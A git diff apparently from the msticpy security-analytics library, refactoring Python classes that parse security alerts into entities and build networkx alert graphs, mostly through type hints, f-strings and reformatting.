+                elif isinstance(src_row.ExtendedProperties, str):
+                    try:
+                        self.extended_properties = json.loads(
+                            src_row.ExtendedProperties
+                        )
+                    except JSONDecodeError:
+                        pass
         self._find_os_family()
 
     @property
-    def entities(self) -> list:
+    def entities(self) -> List[Entity]:
         """Return a list of the Security Alert entities."""
         return list(self._src_entities.values())
 
     @property
-    def query_params(self) -> dict:
+    def query_params(self) -> Dict[str, Any]:
         """
         Query parameters derived from alert.
 
-        Returns:
-            dict(str, str) -- Dictionary of parameter names
+        Returns
+        -------
+            Dict[str, Any]
+                Dictionary of parameter names/value
 
         """
         params_dict = super().query_params
-        if ('system_alert_id' not in params_dict or
-                params_dict['system_alert_id'] is None):
-            params_dict['system_alert_id'] = self._ids['SystemAlertId']
+        if (
+            "system_alert_id" not in params_dict
+            or params_dict["system_alert_id"] is None
+        ):
+            params_dict["system_alert_id"] = self._ids["SystemAlertId"]
         return params_dict
 
-    def to_html(self, show_entities=False):
+    def to_html(self, show_entities=False) -> str:
         """Return the item as HTML string."""
-        title = '''
-        <h3>Alert: '{name}'</h3><br>time=<b>{start}</b>, entity=<b>{entity}</b>, id=<b>{id}</b>
-        <br/>
-        '''.format(start=self._source_data['StartTimeUtc'],
-                   name=self._source_data['AlertDisplayName'],
-                   entity=self._source_data.get(
-                       'CompromisedEntity', 'unknown'),
-                   id=self._source_data['SystemAlertId'])
+        if self.properties:
+            start = self.properties.get(
+                "StartTimeUtc", self.properties.get("StartTime", "no timestamp")
+            )
+            name = self.properties.get(
+                "AlertDisplayName",
+                self.properties.get("DisplayName", "no alert name"),
+            )
+            entity = self.properties.get("CompromisedEntity", "unknown")
+            title = f"""
+            <h3>Alert: '{name}'</h3>
+            <b>Alert_time:</b> {start},
+            <b>Compr_entity:</b> {entity},
+            <b>Alert_id:</b> self.properties['SystemAlertId']
+            """
+        else:
+            title = "Alert has no data."
         return title + super().to_html(show_entities)
 
     # Public methods
@@ -86,9 +105,11 @@ def __str__(self):
         alert_props = str(super().__str__())
 
         if self.extended_properties:
-            str_rep = [f'ExtProp: {prop}: {val}' for prop, val in
-                       self.extended_properties.items()]
-            alert_props = alert_props + '\n' + '\n'.join(str_rep)
+            str_rep = [
+                f"ExtProp: {prop}: {val}"
+                for prop, val in self.extended_properties.items()
+            ]
+            alert_props = alert_props + "\n" + "\n".join(str_rep)
 
         return alert_props
 
@@ -97,61 +118,66 @@ def _resolve_entity_refs(self):
         """
         Resolve and replace entity properties that are '$ref' type.
 
-        When serialized the nested entities can be references to other referenced
-        objects in the collection. This iterates through the raw entities and
-        replaces referenced items with the actual object reference.
-        If the Id referenced by this property exists in the entities dictionary
-        we replace the original property with a reference to the entity in the dictionary
+        When serialized the nested entities can be references to other
+        referenced objects in the collection. This iterates through
+        the raw entities and replaces referenced items with the actual
+        object reference. If the Id referenced by this property exists
+        in the entities dictionary we replace the original property
+        with a reference to the entity in the dictionary.
+
         """
         for _, entity in self._src_entities.items():
             if not isinstance(entity, Entity):
                 continue
-            for prop_name, prop_val in entity.properties.items():
-                if isinstance(prop_val, dict) and '$ref' in prop_val:
-                    entity_id = prop_val['$ref']
+            # Resolve all the simple references
+            ref_props = {
+                name: prop
+                for name, prop in entity.properties.items()
+                if isinstance(prop, dict) and "$ref" in prop
+            }
+            for prop_name, prop_val in ref_props.items():
+                entity_id = prop_val["$ref"]
+                if entity_id in self._src_entities:
+                    entity[prop_name] = self._src_entities[entity_id]
+                    entity.add_edge(entity[prop_name], edge_attrs={"name": prop_name})
+            # Resolve all the lists of references
+            ref_props_multi = {
+                name: prop
+                for name, prop in entity.properties.items()
+                if isinstance(prop, list)
+                and any(elem for elem in prop if "$ref" in elem)
+            }
+            for prop_name, prop_val in ref_props_multi.items():
+                for idx, elem in enumerate(prop_val):
+                    if not isinstance(elem, dict):
+                        continue
+                    entity_id = elem["$ref"]
                     if entity_id in self._src_entities:
-                        entity[prop_name] = self._src_entities[entity_id]
-
-    def _find_os_family(self):
-        """Work out which OSFamily and path separator to use from entities or file paths."""
-        self.path_separator = '\\'
-        self.os_family = 'Windows'
-
-        # Use OSFamily if any entities have this property set
-        os_family_entities = [e for e in self.entities if 'OSFamily' in e]
-        if os_family_entities:
-            for os_entity in os_family_entities:
-                if os_entity['OSFamily'] == 'Linux':
-                    self.os_family = 'Linux'
-                    self.path_separator = '/'
-                    break
-        else:
-            # Otherwise try to infer from the file paths
-            files = [e for e in self.entities if e['Type'] == 'file']
-            if files:
-                for file in files:
-                    if 'Directory' in file and '/' in file['Directory']:
-                        self.os_family = 'Linux'
-                        self.path_separator = '/'
-                        break
-            else:
-                for proc in [e for e in self.entities
-                             if e['Type'] == 'process' and 'ImageFile' in e]:
-                    file = proc['ImageFile']
-                    if 'Directory' in file and '/' in file['Directory']:
-                        self.os_family = 'Linux'
-                        self.path_separator = '/'
-                        break
-
-    def _extract_entities(self, src_row):
+                        entity[prop_name][idx] = self._src_entities[entity_id]
+                        entity.add_edge(
+                            self._src_entities[entity_id],
+                            edge_attrs={"name": prop_name},
+                        )
+
+    def _extract_entities(self, src_row):  # noqa: MC0001
         input_entities = []
+
+        if isinstance(src_row.ExtendedProperties, str):
+            try:
+                ext_props = json.loads(src_row["ExtendedProperties"])
+                for ent, val in ext_props.items():
+                    if ent in ["IpAddress", "Username"]:
+                        input_entities.append({"Entity": val, "Type": ent})
+            except json.JSONDecodeError:
+                pass
+
         if isinstance(src_row.Entities, str):
             try:
-                input_entities = json.loads(src_row['Entities'])
+                input_entities += json.loads(src_row["Entities"])
             except json.JSONDecodeError:
                 pass
         elif isinstance(src_row.Entities, list):
-            input_entities = src_row.Entities
+            input_entities += src_row.Entities
 
         for ent in input_entities:
             try:
@@ -160,7 +186,25 @@ def _extract_entities(self, src_row):
                 # if we didn't instantiate a known entity
                 # just add it as it is
                 entity = UnknownEntity(**ent)
-            if '$id' in ent:
-                self._src_entities[ent['$id']] = entity
-
+            if "$id" in ent:
+                self._src_entities[ent["$id"]] = entity
+            self._extract_child_entities(ent)
         self._resolve_entity_refs()
+
+    def _extract_child_entities(self, src_entity):
+        for prop in src_entity.values():
+            if prop is None:
+                continue
+            if (
+                isinstance(prop, dict)
+                and "$id" in prop
+                and prop["$id"] not in self._src_entities
+            ):
+                self._extract_child_entities(prop)
+                try:
+                    entity = Entity.instantiate_entity(prop)
+                except TypeError:
+                    # if we didn't instantiate a known entity
+                    # just add it as it is
+                    entity = UnknownEntity(**prop)
+                self._src_entities[prop["$id"]] = entity
diff --git a/msticpy/nbtools/security_alert_graph.py b/msticpy/nbtools/security_alert_graph.py
index 3ce7534e8..807cb5c66 100644
--- a/msticpy/nbtools/security_alert_graph.py
+++ b/msticpy/nbtools/security_alert_graph.py
@@ -11,27 +11,28 @@
 import networkx as nx
 import pandas as pd
 
-from . security_alert import SecurityAlert
-from . entityschema import Entity
-from . utility import export, is_not_empty
-from .. _version import VERSION
+from .security_alert import SecurityAlert
+from ..datamodel.entities import Entity
+from ..common.utility import export, is_not_empty
+from .._version import VERSION
 
 __version__ = VERSION
-__author__ = 'Ian Hellen'
+__author__ = "Ian Hellen"
 
 
 @export
 def create_alert_graph(alert: SecurityAlert):
     """Create a networkx graph from the alert and contained entities."""
-    alertentity_graph = nx.Graph(id='AlertGraph')
+    alertentity_graph = nx.Graph(id="AlertGraph")
 
-    alertentity_graph.add_node(alert['AlertType'],
-                               name=alert['AlertType'],
-                               time=str(alert['StartTimeUtc']),
-                               description='Alert: ' +
-                               alert['AlertDisplayName'],
-                               color='red',
-                               node_type='alert')
+    alertentity_graph.add_node(
+        alert["AlertType"],
+        name=alert["AlertType"],
+        time=str(alert["StartTimeUtc"]),
+        description="Alert: " + alert["AlertDisplayName"],
+        color="red",
+        node_type="alert",
+    )
 
     os_family = alert.os_family
 
@@ -39,12 +40,18 @@ def create_alert_graph(alert: SecurityAlert):
     for entity in alert.entities:
         (e_name, e_desc) = _get_name_and_description(entity, os_family)
 
-        alertentity_graph.add_node(e_name, entitytype=entity['Type'], name=e_name,
-                                   description=e_desc, color='green',
-                                   node_type='entity', source=str(entity))
+        alertentity_graph.add_node(
+            e_name,
+            entitytype=entity["Type"],
+            name=e_name,
+            description=e_desc,
+            color="green",
+            node_type="entity",
+            source=str(entity),
+        )
 
         # add an edge by default to the alert
-        alertentity_graph.add_edge(alert['AlertType'], e_name)
+        alertentity_graph.add_edge(alert["AlertType"], e_name)
 
         # Rather than just add edges to the alert, we want to follow the 'natural'
         # relationships between entities and child entities
@@ -56,9 +63,10 @@ def create_alert_graph(alert: SecurityAlert):
             ent_props = entity
         else:
             continue
-        for prop, rel_entity in [(p, v) for (p, v) in ent_props.items()
-                                 if isinstance(v, Entity)]:
-            if rel_entity['Type'] == 'host':
+        for prop, rel_entity in [
+            (p, v) for (p, v) in ent_props.items() if isinstance(v, Entity)
+        ]:
+            if rel_entity["Type"] == "host":
                 # don't add a new edge to the host
                 continue
 
@@ -66,25 +74,29 @@ def create_alert_graph(alert: SecurityAlert):
             # doesn't already exist
             (related_entity, _) = _get_name_and_description(rel_entity)
             if not alertentity_graph.has_edge(related_entity, e_name):
-                alertentity_graph.add_edge(e_name, related_entity, description=prop,
-                                           color='green', weight=1,
-                                           line_type='SHORT_DASH')
+                alertentity_graph.add_edge(
+                    e_name,
+                    related_entity,
+                    description=prop,
+                    color="green",
+                    weight=1,
+                    line_type="SHORT_DASH",
+                )
 
             # if we have a previously created an edge to the alert, remove it
-            if alertentity_graph.has_edge(alert['AlertType'], related_entity):
-                alertentity_graph.remove_edge(
-                    alert['AlertType'], related_entity)
+            if alertentity_graph.has_edge(alert["AlertType"], related_entity):
+                alertentity_graph.remove_edge(alert["AlertType"], related_entity)
 
         # if we haven't added an edge to this entity from anything else,
         # add one to the alert
         if not alertentity_graph.neighbors(e_name):
-            alertentity_graph.add_edge(alert['AlertType'], e_name)
+            alertentity_graph.add_edge(alert["AlertType"], e_name)
 
     return alertentity_graph
 
 
 @export
-def add_related_alerts(related_alerts: pd.DataFrame, alertgraph: nx.Graph) ->nx.Graph:
+def add_related_alerts(related_alerts: pd.DataFrame, alertgraph: nx.Graph) -> nx.Graph:
     """
     Add related alerts to the graph.
 
@@ -92,119 +104,119 @@ def add_related_alerts(related_alerts: pd.DataFrame, alertgraph: nx.Graph) ->nx.
     """
     related_alerts_graph = alertgraph.copy()
 
-    alert_host_node = _find_graph_node(related_alerts_graph, 'host', '')
+    alert_host_node = _find_graph_node(related_alerts_graph, "host", "")
 
-    related_alerts.apply(lambda x: _add_alert_node(
-        related_alerts_graph, x), axis=1)
+    related_alerts.apply(lambda x: _add_alert_node(related_alerts_graph, x), axis=1)
     if alert_host_node:
-        related_alerts.apply(lambda x:
-                             _add_related_alert_edges(related_alerts_graph,
-                                                      x,
-                                                      alert_host_node), axis=1)
+        related_alerts.apply(
+            lambda x: _add_related_alert_edges(
+                related_alerts_graph, x, alert_host_node
+            ),
+            axis=1,
+        )
     return related_alerts_graph
 
 
 def _add_related_alert_edges(related_alerts_graph, alert_row, default_node):
     related_alert = SecurityAlert(alert_row)
     if related_alert.primary_account is not None:
-        acct_node = _find_graph_node(related_alerts_graph, 'account',
-                                     related_alert.primary_account.qualified_name)
+        acct_node = _find_graph_node(
+            related_alerts_graph,
+            "account",
+            related_alert.primary_account.qualified_name,
+        )
         if acct_node is not None:
-            _add_related_alert_edge(
-                related_alerts_graph, acct_node, related_alert)
+            _add_related_alert_edge(related_alerts_graph, acct_node, related_alert)
 
     if related_alert.primary_process is not None:
-        proc_node = _find_graph_node(related_alerts_graph,
-                                     'process',
-                                     related_alert.primary_process.ProcessFilePath)
+        proc_node = _find_graph_node(
+            related_alerts_graph,
+            "process",
+            related_alert.primary_process.ProcessFilePath,
+        )
         if proc_node is not None:
-            _add_related_alert_edge(
-                related_alerts_graph, proc_node, related_alert)
+            _add_related_alert_edge(related_alerts_graph, proc_node, related_alert)
 
     if related_alert.primary_host is not None:
-        host_node = _find_graph_node(related_alerts_graph,
-                                     'host', related_alert.primary_host['HostName'])
+        host_node = _find_graph_node(
+            related_alerts_graph, "host", related_alert.primary_host["HostName"]
+        )
         if host_node is not None:
-            _add_related_alert_edge(
-                related_alerts_graph, host_node, related_alert)
+            _add_related_alert_edge(related_alerts_graph, host_node, related_alert)
 
     # if we haven't added an edge to this entity from anything else,
     # add one to the alert
-    if not related_alerts_graph[related_alert['AlertType'] + '(R)']:
-        _add_related_alert_edge(related_alerts_graph,
-                                default_node, related_alert)
+    if not related_alerts_graph[related_alert["AlertType"] + "(R)"]:
+        _add_related_alert_edge(related_alerts_graph, default_node, related_alert)
 
 
 def _add_alert_node(nx_graph, alert):
     """Add alert node to the graph."""
-    nx_graph.add_node(alert['AlertType'] + '(R)',
-                      name=alert['AlertType'],
-                      time=str(alert['StartTimeUtc']),
-                      displayname=alert['AlertDisplayName'],
-                      color='red',
-                      count=0,
-                      node_type='alert')
+    nx_graph.add_node(
+        alert["AlertType"] + "(R)",
+        name=alert["AlertType"],
+        time=str(alert["StartTimeUtc"]),
+        displayname=alert["AlertDisplayName"],
+        color="red",
+        count=0,
+        node_type="alert",
+    )
 
 
 def _find_graph_node(nx_graph, node_type, target_name):
     """Find a node with a given name and type."""
-    node_prefix = '{}: {}'.format(node_type, target_name)
-    nodes = [n for (n, n_type) in
-             nx.get_node_attributes(nx_graph, 'entitytype').items()
-             if n_type == node_type and n.startswith(node_prefix)]
+    node_prefix = f"{node_type}: {target_name}"
+    nodes = [
+        n
+        for (n, n_type) in nx.get_node_attributes(nx_graph, "entitytype").items()
+        if n_type == node_type and n.startswith(node_prefix)
+    ]
     if nodes:
         return nodes[0]
+    return None
 
 
 def _add_related_alert_edge(nx_graph, source, target):
     """Add related alert to an existing graph."""
-    count_attrs = nx.get_node_attributes(nx_graph, 'count')
-    target_node = target['AlertType'] + '(R)'
-    if target_node in count_attrs:
-        current_count = count_attrs[target_node]
-    else:
-        current_count = 0
+    count_attrs = nx.get_node_attributes(nx_graph, "count")
+    target_node = target["AlertType"] + "(R)"
+    current_count = count_attrs[target_node] if target_node in count_attrs else 0
     current_count += 1
 
-    description = 'Related alert: {}  Count:{}'.format(target['AlertType'],
-                                                       current_count)
-    node_attrs = {target_node: {
-        'count': current_count, 'description': description}}
+    description = f"Related alert: {target['AlertType']}  Count:{current_count}"
+    node_attrs = {target_node: {"count": current_count, "description": description}}
     nx.set_node_attributes(nx_graph, node_attrs)
-    nx_graph.add_edge(source, target_node, weight=0.7,
-                      description='Related Alert')
+    nx_graph.add_edge(source, target_node, weight=0.7, description="Related Alert")
 
 
 def _get_account_qualified_name(account):
-    if 'Name' in account:
-        name = account['Name']
-    if 'NTDomain' in account:
-        return '{}\\{}'.format(account['NTDomain'], name)
-    else:
-        return name
+    name = account["Name"] if "Name" in account else None
+    if "NTDomain" in account:
+        return f"{account['NTDomain']}\\{name}"
+    return name
 
 
-def _get_name_and_description(entity, os_family='Windows'):
+def _get_name_and_description(entity, os_family="Windows"):
     """Get name and description for entity."""
     e_name = None
     e_description = None
 
-    if entity['Type'] == 'host':
+    if entity["Type"] == "host":
         e_name, e_description = _get_host_name_desc(entity, os_family)
-    elif entity['Type'] == 'account':
+    elif entity["Type"] == "account":
         e_name, e_description = _get_account_name_desc(entity)
-    elif entity['Type'] == 'host-logon-session':
-        e_name = 'host-logon-session'
-        e_description = 'Logon session {}\n(Start time: {})'.format(entity['SessionId'],
-                                                                    entity['StartTimeUtc'])
-    elif entity['Type'] == 'process':
+    elif entity["Type"] == "host-logon-session":
+        e_name = "host-logon-session"
+        e_description = f'Logon session {entity["SessionId"]}\n'
+        e_description = e_description + f'(Start time: {entity["StartTimeUtc"]}'
+    elif entity["Type"] == "process":
         e_name, e_description = _get_process_name_desc(entity)
-    elif entity['Type'] == 'file':
+    elif entity["Type"] == "file":
         e_name, e_description = _get_file_name_desc(entity)
-    elif entity['Type'] == 'ip' or entity['Type'] == 'ipaddress':
+    elif entity["Type"] in ["ip", "ipaddress"]:
         e_name, e_description = _get_ip_name_desc(entity)
-    elif entity['Type'] == 'dns':
-        e_name = '{}: {}'.format(entity['Type'], entity['DomainName'])
+    elif entity["Type"] == "dns":
+        e_name = f"{entity['Type']}: {entity['DomainName']}"
         e_description = e_name
     else:
         # Any other type of entity
@@ -215,95 +227,103 @@ def _get_name_and_description(entity, os_family='Windows'):
 
 # Methods to construct name and description
 def _get_other_name_desc(entity):
-    if 'Name' in entity:
-        e_name = entity['Name']
-        e_name = '{}: {}'.format(entity['Type'], e_name)
+    if "Name" in entity:
+        e_name = entity["Name"]
+        e_name = f"{entity['Type']}: {e_name}"
     else:
-        e_name = entity['Type']
+        e_name = entity["Type"]
 
     if isinstance(entity, Entity):
         ent_props = entity.properties
     elif isinstance(entity, dict):
         ent_props = entity
     else:
-        ent_props = {'unknown': None}
-
-    # Nasty dict comprehension to join all other items in the dictionary into a string
-    e_properties = '\n'.join({'{}:{}'.format(k, v) for (k, v)
-                              in ent_props.items() if (k not in ('Type', 'Name') and
-                                                       isinstance(v, str))})
-    e_description = '{}\n{})'.format(e_name, e_properties)
+        ent_props = {"unknown": None}
+
+    # Nasty dict comprehension to join all other items in the
+    # dictionary into a string
+    e_properties = "\n".join(
+        {
+            f"{k}:{v}"
+            for (k, v) in ent_props.items()
+            if (k not in ("Type", "Name") and isinstance(v, str))
+        }
+    )
+    e_description = f"{e_name}\n{e_properties})"
     return e_name, e_description
 
 
 def _get_ip_name_desc(entity):
-    e_name = entity['Address']
-    e_name = '{}: {}'.format(entity['Type'], e_name)
-    if 'Location' in entity and entity['Location']:
-        e_description = '{}\nc={}, st={}, city={}'.format(
-            e_name,
-            entity['Location'].CountryCode,
-            entity['Location'].State,
-            entity['Location'].City)
+    e_name = entity["Address"]
+    e_name = f"{entity['Type']}: {e_name}"
+    if "Location" in entity and entity["Location"]:
+        e_description = (
+            f"{e_name}\nc={entity['Location']['CountryCode']}, "
+            f"st={entity['Location']['State']}, city={entity['Location']['City']}"
+        )
     else:
         e_description = e_name
     return e_name, e_description
 
 
 def _get_file_name_desc(entity):
-    e_name = entity['FullPath']
-    e_name = '{}: {}'.format(entity['Type'], e_name)
-    e_description = e_name
-    return e_name, e_description
+    e_name = entity["FullPath"]
+    e_name = f"{entity.Type}: {e_name}"
+    return e_name, e_name
 
 
 def _get_process_name_desc(entity):
-    if 'ProcessFilePath' in entity:
+    if "ProcessFilePath" in entity:
         path = entity.ProcessFilePath
-    elif 'ImageFile' in entity and entity['ImageFile']:
-        path = entity['ImageFile']['FullPath']
+    elif (
+        "ImageFile" in entity
+        and entity["ImageFile"]
+        and "FullPath" in entity["ImageFile"]
+    ):
+        path = entity["ImageFile"]["FullPath"]
     else:
-        path = 'unknown'
-    pid = entity.ProcessId if entity.ProcessId else 'PID unknown'
-    e_name = path + ' [' + pid + ']'
-    e_name = '{}: {}'.format(entity['Type'], e_name)
-    e_description = '{}\n(cmdline: \'{}\')'.format(e_name, entity.CommandLine)
+        path = "unknown"
+    pid = entity.ProcessId or "PID unknown"
+    e_name = path + " [" + pid + "]"
+    e_name = f"{entity['Type']}: {e_name}"
+    e_description = f"{e_name}\n(cmdline: '{entity.CommandLine}')"
     return e_name, e_description
 
 
 def _get_account_name_desc(entity):
-    e_name = (entity['NTDomain'] +
-              '\\' if 'NTDomain' in entity else '') + entity['Name']
-    e_name = '{}: {}'.format(entity['Type'], e_name)
-    if 'IsDomainJoined' in entity:
-        domain_joined = entity['IsDomainJoined']
+    e_dom = entity["NTDomain"]
+    e_dom = e_dom + "\\" if e_dom else ""
+    e_name = e_dom + (
+        entity["Name"] or entity["AadUserId"] or entity["DisplayName"] or "unknown"
+    )
+    e_name = f"{entity.Type}: {e_name}"
+    if "IsDomainJoined" in entity:
+        domain_joined = entity["IsDomainJoined"]
     else:
-        domain_joined = 'false'
-    if 'LogonId' in entity:
-        e_description = '{}\n(LogonId: {}, Domain-joined: {})'.format(e_name,
-                                                                      entity.LogonId,
-                                                                      domain_joined)
+        domain_joined = "false"
+    if "LogonId" in entity:
+        e_description = f"{e_name}\n(LogonId: {entity.LogonId},"
+        e_description = e_description + f" Domain-joined: {domain_joined})"
     else:
-        e_description = '{}\n(Domain-joined: {})'.format(e_name, domain_joined)
+        e_description = f"{e_name}\n(Domain-joined: {domain_joined})"
     return e_name, e_description
 
 
 def _get_host_name_desc(entity, os_family):
-    if 'DnsDomain' in entity and is_not_empty(entity['DnsDomain']):
-        e_name = '{}.{}'.format(entity['HostName'], entity['DnsDomain'])
-    elif 'NTDomain' in entity and is_not_empty(entity['NTDomain']):
-        e_name = '{}/{}'.format(entity['NTDomain'], entity['HostName'])
+    if "DnsDomain" in entity and is_not_empty(entity["DnsDomain"]):
+        e_name = f"{entity.HostName}.{entity.DnsDomain}"
+    elif "NTDomain" in entity and is_not_empty(entity["NTDomain"]):
+        e_name = f"{entity.NTDomain}/{entity.HostName}"
     else:
-        e_name = entity['HostName']
-    e_name = '{}: {}'.format(entity['Type'], e_name)
+        e_name = entity["HostName"]
+    e_name = f"{entity.Type}: {e_name}"
 
-    if 'IsDomainJoined' in entity:
-        domain_joined = entity['IsDomainJoined']
+    if "IsDomainJoined" in entity:
+        domain_joined = entity["IsDomainJoined"]
     else:
-        domain_joined = 'false'
-    if 'OSFamily' in entity:
-        os_family = entity['OSFamily']
-    e_description = '{}\n({}, Domain-joined: {})'.format(e_name,
-                                                         os_family, domain_joined)
+        domain_joined = "false"
+    if "OSFamily" in entity:
+        os_family = entity["OSFamily"]
+    e_description = f"{e_name}\n({os_family}, Domain-joined: {domain_joined})"
 
     return e_name, e_description
diff --git a/msticpy/nbtools/security_base.py b/msticpy/nbtools/security_base.py
index 2febb6a9f..c79c66776 100644
--- a/msticpy/nbtools/security_base.py
+++ b/msticpy/nbtools/security_base.py
@@ -6,26 +6,39 @@
 """Module for SecurityAlert class."""
 import html
 import re
-from datetime import datetime
 from collections import Counter
+from datetime import datetime
+from typing import Any, Dict, List, Optional, Union
 
 import pandas as pd
+from deprecated.sphinx import deprecated
 
-from .entityschema import Process
-from .query_defns import QueryParamProvider, DataFamily, DataEnvironment
-from .utility import is_not_empty, escape_windows_path
-from . utility import export
-from .. _version import VERSION
+from .._version import VERSION
+from ..common.utility import escape_windows_path, export
+from ..data.query_defns import DataEnvironment, QueryParamProvider
+from ..datamodel.entities import Account, Entity, Host, Process, OSFamily
 
 __version__ = VERSION
-__author__ = 'Ian Hellen'
-
-_ID_PROPERTIES = ['AzSubscriptionId', 'AzResourceId', 'WorkspaceId', 'AgentId',
-                  'TenantId', 'SourceComputerId', 'ResourceId',
-                  'WorkspaceSubscriptionId', 'WorkspaceResourceGroup',
-                  'ProviderAlertId', 'SystemAlertId', 'ResourceId']
-
-
+__author__ = "Ian Hellen"
+
+_ID_PROPERTIES: List[str] = [
+    "AzSubscriptionId",
+    "AzResourceId",
+    "WorkspaceId",
+    "AgentId",
+    "TenantId",
+    "SourceComputerId",
+    "ResourceId",
+    "WorkspaceSubscriptionId",
+    "WorkspaceResourceGroup",
+    "ProviderAlertId",
+    "SystemAlertId",
+    "ResourceId",
+]
+
+
+# pylint: disable=too-many-public-methods
+@deprecated(reason="Replaced by Alert entity in datamodel", version="1.7.0")
 @export
 class SecurityBase(QueryParamProvider):
     """
@@ -37,28 +50,28 @@ class SecurityBase(QueryParamProvider):
 
     def __init__(self, src_row: pd.Series = None):
         """Instantiate a security alert from a pandas Series."""
-        self._source_data = src_row
-        self._custom_query_params = {}
-        self._entities = []
+        self._source_data: pd.Series = src_row
+        self._custom_query_params: Dict[str, Any] = {}
+        self._entities: List[Entity] = []
 
         # Extract and cache alert ID properties
-        self._ids = dict()
-        for id_property in _ID_PROPERTIES:
-            if id_property in self._source_data:
-                self._ids[id_property] = self._source_data[id_property]
+        self._ids: Dict[str, str] = {}
+        if self._source_data is not None:
+            for id_property in _ID_PROPERTIES:
+                if id_property in self._source_data:
+                    self._ids[id_property] = self._source_data[id_property]
 
-        self.path_separator = '\\'
-        self.os_family = 'Windows'
+        self.path_separator = "\\"
+        self.os_family = "Windows"
 
     # Dunder methods
     def __getitem__(self, key):
         """Allow property get using dictionary key syntax."""
         if key in self.__dict__:
             return self.__dict__[key]
-        elif key in self._source_data:
+        if key in self._source_data:
             return self._source_data[key]
-        else:
-            raise KeyError
+        raise KeyError
 
     def __setitem__(self, key, value):
         """Allow property set using dictionary key syntax."""
@@ -73,19 +86,27 @@ def __getattr__(self, name):
         """Return the value of the named property 'name'."""
         if name in self._source_data:
             return self._source_data[name]
-        raise AttributeError(f'{name} is not a valid attribute.')
+        raise AttributeError(f"{name} is not a valid attribute.")
 
     def __str__(self):
         """Return string representation of object properties."""
-        str_props = [f'{prop}: {val}' for prop, val in
-                     self._source_data.items()]
+        str_props = [f"{prop}: {val}" for prop, val in self._source_data.items()]
 
         if self.entities:
-            str_entities = []
-            for ent in self.entities:
-                str_entities.append(str(ent).replace('\n', ', '))
-            str_props = str_props + str_entities
-        return '\n'.join(str_props)
+            str_entities = [str(ent).replace("\n", ", ") for ent in self.entities]
+            str_props += str_entities
+        return "\n".join(str_props)
+
+    def __repr__(self) -> str:
+        """Return repr of item."""
+        params = ", ".join([f"{name}={val}" for name, val in self.properties.items()])
+        if len(params) > 80:
+            params = params[:80] + "..."
+        return f"{self.__class__.__name__}({params})"
+
+    def _repr_html_(self) -> str:
+        """Display in IPython."""
+        return self.to_html()
 
     # def __getstate__(self):
     #     """Return dictionary of state for serialization/pickling."""
@@ -105,17 +126,38 @@ def __str__(self):
 
     # Properties
     @property
-    def entities(self):
-        """Return a list of the Security Alert entities."""
+    def entities(self) -> List[Entity]:
+        """
+        Return a list of the Alert or Event entities.
+
+        Returns
+        -------
+        List[Entity]
+            List of the Alert or Event entities.
+
+        """
         return self._entities
 
     @property
-    def hostname(self):
+    def properties(self) -> Dict[str, Any]:
+        """
+        Return a dictionary of the Alert or Event properties.
+
+        Returns
+        -------
+        Dict[str, Any]
+            dictionary of the Alert or Event properties.
+
+        """
+        return self._source_data.to_dict()
+
+    @property
+    def hostname(self) -> str:
         """Return the Hostname (not FQDN) of the host associated with the alert."""
-        return self.get_entity_property(entity_type='host', entity_property='HostName')
+        return self.primary_host.HostName if self.primary_host is not None else None
 
     @property
-    def computer(self):
+    def computer(self) -> Optional[str]:
         """
         Return the Computer name of the host associated with the alert.
 
@@ -124,94 +166,131 @@ def computer(self):
         return self.primary_host.computer if self.primary_host is not None else None
 
     @property
-    def ids(self):
+    def ids(self) -> Dict[str, str]:
         """Return a collection of Identity properties for the alert."""
         return self._ids
 
     @property
-    def is_in_workspace(self):
+    def is_in_workspace(self) -> bool:
         """Return True if the alert has a Log Analytics WorkspaceID."""
-        return 'WorkspaceId' in self._ids and 'AgentId' in self._ids
+        return "WorkspaceId" in self._ids and "AgentId" in self._ids
 
     @property
-    def is_in_log_analytics(self):
+    def is_in_log_analytics(self) -> bool:
         """Return True if the alert originates from a Log Analytics Workspace host."""
-        return 'TenantId' in self._ids
+        return "TenantId" in self._ids
 
     @property
-    def is_in_azure_sub(self):
+    def is_in_azure_sub(self) -> bool:
         """Return True if the alert originates from an Azure Security Center host."""
-        if ('AzSubscriptionId' not in self._ids and
-                'AzResourceId' not in self._ids and
-                'ResourceId' in self._ids and self._ids['ResourceId']):
-            self._ids['AzResourceId'] = self._id['ResourceId']
-            self._ids['AzSubscriptionId'] = (
-                self._get_subscription_from_resource(self._id['ResourceId']))
-
-        return 'AzSubscriptionId' in self._ids and 'AzResourceId' in self._ids
+        if (
+            "AzSubscriptionId" not in self._ids
+            and "AzResourceId" not in self._ids
+            and "ResourceId" in self._ids
+            and self._ids["ResourceId"]
+        ):
+            self._ids["AzResourceId"] = self._id["ResourceId"]
+            res = self._get_subscription_from_resource(self._id["ResourceId"])
+            if res:
+                self._ids["AzSubscriptionId"] = res
+
+        return "AzSubscriptionId" in self._ids and "AzResourceId" in self._ids
 
     @property
-    def primary_host(self):
-        """Return the Primary host entity of the host associated with the alert."""
-        hosts = self.get_entities_of_type('host')
+    def primary_host(self) -> Optional[Union[Host, Entity]]:
+        """
+        Return the primary host entity (if any) associated with this object.
+
+        Returns
+        -------
+        Optional[Host]
+            primary host entity (if any)
+
+        """
+        hosts = self.get_entities_of_type("host")
         if hosts:
             return hosts[0]
         return None
 
     @property
-    def primary_process(self):
-        """Return the primary process entity (if any) associated with the alert."""
-        procs = self.get_entities_of_type('process')
+    def primary_process(self) -> Optional[Union[Process, Entity]]:
+        """
+        Return the primary process entity (if any) associated with this object.
+
+        Returns
+        -------
+        Optional[Process]
+            primary process entity (if any)
+
+        """
+        procs = self.get_entities_of_type("process")
         if not procs:
             return None
         if len(procs) == 1:
             return procs[0]
 
         # find the first process that has a parent process property
-        procs_with_parent = [p for p in procs if 'ParentProcess' in p]
+        procs_with_parent = [
+            proc
+            for proc in procs
+            if "ParentProcess" in proc
+            and proc["ParentProcess"]
+            and proc.ParentProcess.ProcessId in {proc.ProcessId for proc in procs}
+        ]
         return procs_with_parent[0] if procs_with_parent else procs[0]
 
     @property
-    def primary_account(self):
-        """Return the primary account entity (if any) associated with this object."""
-        accts = self.get_entities_of_type('account')
+    def primary_account(self) -> Optional[Union[Process, Entity]]:
+        """
+        Return the primary account entity (if any) associated with this object.
+
+        Returns
+        -------
+        Optional[Process]
+            primary account entity (if any)
+
+        """
+        accts = self.get_entities_of_type("account")
         return accts[0] if accts else None
 
     @property
-    def query_params(self):
+    def query_params(self) -> Dict[str, Any]:
         """
         Query parameters derived from alert.
 
-        Returns:
-            dict(str, str) -- Dictionary of parameter names
+        Returns
+        -------
+        Dict[str, Any]
+            Dictionary of parameter names/values
 
         """
         try:
-            if self.primary_host:
